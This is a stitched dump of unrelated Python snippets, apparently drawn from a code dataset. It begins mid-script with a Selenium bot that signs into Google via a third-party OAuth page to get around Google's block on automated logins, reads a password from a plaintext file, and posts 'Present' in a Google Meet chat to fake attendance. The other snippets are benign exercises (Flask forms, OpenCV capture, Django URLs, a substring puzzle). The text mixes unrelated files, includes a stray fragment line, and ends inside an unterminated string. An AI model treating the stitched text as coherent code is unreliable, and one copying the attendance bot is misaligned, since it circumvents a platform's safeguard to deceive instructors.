driver.get("https://accounts.google.com/o/oauth2/auth/identifier?client_id=717762328687-iludtf96g1hinl76e4lc1b9a82g457nn.apps.googleusercontent.com&scope=profile%20email&redirect_uri=https%3A%2F%2Fstackauth.com%2Fauth%2Foauth2%2Fgoogle&state=%7B%22sid%22%3A1%2C%22st%22%3A%2259%3A3%3Abbc%2C16%3A1e10afed606ab28c%2C10%3A1622115835%2C16%3A4fd48bbee178515d%2Ca8a48ab5363d05a7b8d1430d3fc4e222fad429b6fd3847d13f1444f9d092fb71%22%2C%22cdl%22%3Anull%2C%22cid%22%3A%22717762328687-iludtf96g1hinl76e4lc1b9a82g457nn.apps.googleusercontent.com%22%2C%22k%22%3A%22Google%22%2C%22ses%22%3A%22fbe67d41c240458e9ae21024ca96307b%22%7D&response_type=code&flowName=GeneralOAuthFlow")#For Security Purpose Google Does Not Allow Selenium To Sign Account So We Need To Sign In With Stack OverFlow
sleep(2)
gmail = driver.find_element_by_xpath("/html/body/div[1]/div[1]/div[2]/div/div[2]/div/div/div[2]/div/div[1]/div/form/span/section/div/div/div[1]/div/div[1]/div/div[1]/input")
email = open("email.txt", "r").read()#Enter your gmail id in the email.txt file
gmail.send_keys(email)
gmail.send_keys(Keys.ENTER)
sleep(3)
pas = driver.find_element_by_xpath("/html/body/div[1]/div[1]/div[2]/div/div[2]/div/div/div[2]/div/div[1]/div/form/span/section/div/div/div[1]/div[1]/div/div/div/div/div[1]/div/div[1]/input")
passwd = open("Password.txt", "r").read()#enter your password in password.txt file
pas.send_keys(passwd)
pas.send_keys(Keys.ENTER)
sleep(3)
driver.get("https://meet.google.com")
link = driver.find_element_by_xpath("/html/body/c-wiz/div/div[2]/div/div[1]/div[3]/div/div[2]/div[1]/label/input")
code = input("Enter Your Meeting Code(within 10sec): ")
sleep(10)
link.send_keys(code)
link.send_keys(Keys.ENTER)
sleep(4)
dis_btn = driver.find_element_by_xpath("/html/body/div/div[3]/div/div[2]/div[3]/div/span/span")
dis_btn.click()
sleep(5)
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("enter", do_press=True, do_release=True)
sleep(2)
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("tab", do_press=True, do_release=True)
keyboard.send("enter", do_press=True, do_release=True)
#if your cam is off as default skip the following parts(cam_off and mic_off)
sleep(3)
cam_off = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div/div/div[9]/div[3]/div/div/div[2]/div/div[1]/div[1]/div[1]/div/div[4]/div[2]/div/div")
cam_off.click()
sleep(2)
mic_off = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div/div/div[9]/div[3]/div/div/div[2]/div/div[1]/div[1]/div[1]/div/div[4]/div[1]/div/div/div")
mic_off.click()
sleep(3)
join_btn = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div/div/div[9]/div[3]/div/div/div[2]/div/div[1]/div[2]/div/div[2]/div/div[1]/div[1]/span")
join_btn.click()
sleep(60)#You Are Unable To Send The Following Attendance If The Host Does Not Allow You So Increase The Sleep Time As much As Possible
mess_box = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div[1]/div/div[9]/div[3]/div[1]/div[3]/div/div[2]/div[3]/span/span")
mess_box.click()
sleep(3)
chat_box = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div[1]/div/div[9]/div[3]/div[4]/div/div[2]/div[2]/div[2]/span[2]/div/div[4]/div[1]/div[1]/div[2]/textarea")
chat_box.send_keys("Your Name Present Sir/Mam")
chat_box.send_keys(Keys.ENTER)
sleep(2)
close = driver.find_element_by_xpath("/html/body/div[1]/c-wiz/div[1]/div/div[9]/div[3]/div[4]/div/div[2]/div[1]/div[2]/div/span/button/i")
close.click()
#https://meet.google.com/hyu-hbzv-uei
#if you face any error try increasing the sleep time or inspecting the particular element again
|
24,182 | 78316b5f7e2b65b946a8571418b4d6bbf08c3161 | import csv
from bot import getResponseData
def getTimeTable(context):
with open('timetable.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
timetable = []
heading = []
for i, row in enumerate(csv_reader):
if i == 0:
heading = row
elif (getResponseData(context, 0).lower() == row[0].lower()) and (getResponseData(context, 1).lower() == row[4].lower()) and (getResponseData(context, 2).lower() == row[1].lower()):
timetable.append(dict(zip(heading, row)))
return timetable
def getTimeTablebyQPCode(qpcode):
with open('timetable.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
timetable = []
heading = []
for i, row in enumerate(csv_reader):
if i == 0:
heading = row
elif ((qpcode == row[5])):
timetable.append(dict(zip(heading, row)))
return timetable
def getAllCourseOfSemester(context):
with open('timetable.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
courses = []
for course in csv_reader:
if (course[1] not in courses) and (getResponseData(context, 0).lower() == course[0].lower()) and (getResponseData(context, 1).lower() == course[4].lower()):
courses.append(course[1])
return courses
def getAllUniversities():
with open('timetable.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
university = []
for uni in csv_reader:
if uni[0] not in university:
university.append(uni[0])
return university[1:]
def getAllSemesterOfUniversity(universityName):
with open('timetable.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
semesters = []
for sem in csv_reader:
if (sem[4] not in semesters) and (sem[0].lower() == universityName.lower()):
semesters.append(sem[4])
return semesters
|
24,183 | a329f232ef36481685ef585cb8acb16a51e31224 | import numpy as np
import cv2
import sys
database_path = '../databases/' + str(sys.argv[1]) + '/'
face_cascade = cv2.CascadeClassifier('xml/haarcascade_frontalface_default.xml')
count_faces = 0
cap = cv2.VideoCapture(0)
max_faces = 10
scale_fact = 1.0
while(count_faces < max_faces):
key = cv2.waitKey(1);
ret, frame = cap.read()
imgGray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
imgGray = cv2.equalizeHist(imgGray)
faces = face_cascade.detectMultiScale(imgGray, 1.3, 5)
for (x,y,w,h) in faces:
if (len(faces) > 0):
frame = cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)
xinit = x-(w*(scale_fact-1))
yinit = y-(h*(scale_fact-1))
crop_img = imgGray[yinit:yinit+(h*scale_fact),xinit:xinit+(w*scale_fact)]
cv2.imshow('teste', crop_img)
if key & 0xFF == ord('w'):
cv2.imwrite(database_path + str(count_faces)+'.pgm', crop_img)
print("IMAGE SAVE: " + str(count_faces))
count_faces = count_faces + 1;
cv2.imshow('img',frame)
if key & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
24,184 | 86aa6152fedbd5065d795bb14c313cee21323828 | # exemplo com labels e botões funcionais
from tkinter import *
# define uma função para o botão
def bt_click():
print('bt_click')
# altera o atributo text da variável lb
lb['text'] = 'Funciona'
janela = Tk()
# cria um botão, command define uma função a ser executada quando o botão for clicado
bt = Button(janela, width=20, text='OK', command=bt_click)
# define a localização do botão
bt.place(x=100, y=100)
# cria um label com a variável lb
lb = Label(janela, text='Teste')
# define a localização de lb
lb.place(x=100, y=150)
janela.geometry('300x300+200+200')
janela.mainloop()
|
24,185 | f4c4350a39ae3231bf69c1ff0e5cc5c9d1bde304 | 'exam3[0].out[0]',[0,17],
|
24,186 | 9a4d28be52d3b610f77816be416c23658bffcf61 | from project.students.models import Student
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed
from wtforms import StringField, SubmitField, PasswordField, validators, TextAreaField
class SignUp(FlaskForm):
fname = StringField('First Name:', [validators.InputRequired()])
lname = StringField('Last Name:', [validators.InputRequired()])
uname = StringField('Username:', [ validators.InputRequired() ])
email = StringField('Email:', [validators.InputRequired(), validators.Email()])
password = PasswordField('Password:',[validators.InputRequired(), validators.EqualTo('repassword', message='Passwords must match')])
repassword = PasswordField('Confirm Password:')
submit = SubmitField('Sign Up')
def validate_email(self, email):
student = Student.query.filter_by(email=email.data).first()
if student is not None:
raise validators.ValidationError('Please use a different email address.')
class LogIn(FlaskForm):
email = StringField('Email:', [ validators.InputRequired(), validators.Email() ])
password = PasswordField('Password', [ validators.InputRequired() ])
submit = SubmitField('Log In')
class ChangeBasic(FlaskForm):
firstname = StringField('First Name')
lastname = StringField('Last Name')
bio = TextAreaField('Bio')
submit = SubmitField('Submit')
class ChangeDP(FlaskForm):
picture = FileField('Update Profile Picture: ', validators=[FileAllowed(['jpg', 'png', 'jpeg'])])
submit = SubmitField('Update')
class ChangePassword(FlaskForm):
oldpassword = PasswordField('Op', [ validators.InputRequired() ])
newpassword = PasswordField('Np', [ validators.InputRequired() ])
confirmpassword = PasswordField('Cp', [ validators.InputRequired() ])
submit = SubmitField('Submit')
class Deactivate(FlaskForm):
confirmpassword = PasswordField('confirm', [ validators.InputRequired() ])
submit = SubmitField('Submit') |
24,187 | b7b3688127fe36c46431b234250a1ed3d6d3f527 | from modeltranslation.translator import TranslationOptions, translator
from rating.models import Rating
class RatingTranslationOptions(TranslationOptions):
fields = ["name", "description"]
translator.register(Rating, RatingTranslationOptions)
|
24,188 | e998092125b5023c1581c6c8f7ab19eb6b196a08 | print(dir())
#var1 = 90
#var = 90 #use with both combination of import
print(dir())
#import mod1
from mod1 import *
print(dir()) |
24,189 | ecef91cc9b17faaa6511522a070409d19f4a030a | from django.contrib import admin
from django.urls import path
from auth import views
urlpatterns = [
path('admin/', admin.site.urls),
path('login/', views.Loginkar.as_view()),
path('logout/', views.Logoutkar.as_view()),
] |
24,190 | b93c91c822c91d76edaedb97e30dcdcdb0fde7db | def lengthOfLongestSubstring(s):
"""
:type s: str
:rtype: int
"""
# if len(s)==0:
# return ''
i=1
while i<len(s):
j=0
while j<i:
if s[i] == s[j]:
ss2 = lengthOfLongestSubstring(s[j+1:])
if len(ss2)>i:
return ss2
else:
return s[:i]
j=j+1
i=i+1
return s
def lengthOfLongestSubstring2(s):
LEN=1
i=1
lastss = (s,0)
j_ini=0
while i<len(s):
j=j_ini
while j<i:
if s[i] == s[j]:
if lastss[LEN]<=len(s[j_ini:i]):
lastss=(s[j_ini:i], i-j_ini)
# print(lastss[0], j_ini,j)
j_ini = j+1
i=j_ini
break
j=j+1
i=i+1
return lastss[0] if lastss[1]>len(s)-j_ini else s[j_ini:]
new_str="""abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ ab
cdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcde
fghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefgh
ijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijk
lmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmn
opqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopq
rstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrst
uvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvw
xyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABC
DEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEF
GHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHI
JKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKL
MNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNO
PQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQR
STUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU
VWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX
YZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0
123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123
456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456
789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"
#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%
&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'(
)*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+
,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-.
/:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;
<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>
?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[
\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]
^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`
{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}
~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ a
bcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcd
efghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefg
hijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghij
klmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklm
nopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnop
qrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrs
tuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuv
wxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxy
zABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzAB
CDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDE
FGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGH
IJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJK
LMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN
OPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ
RSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST
UVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW
XYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ012
3456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ012345
6789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ012345678
9!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\
"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$
%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'
()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*
+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-
./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:
;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=
>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@
[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\
]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_
`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|
}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abc
defghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdef
ghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghi
jklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijkl
mnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmno
pqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqr
stuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstu
vwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwx
yzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzA
BCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD
EFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFG
HIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJ
KLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM
NOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOP
QRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS
TUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV
WXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY
Z0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01
23456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234
56789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567
89!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!
\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#
$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&
'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()
*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,
-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./
:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<
=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?
@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\
\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^
_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{
|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ ab
cdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcde
fghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefgh
ijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijk
lmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmn
opqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopq
rstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrst
uvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvw
xyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABC
DEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEF
GHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHI
JKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKL
MNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNO
PQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQR
STUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU
VWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX
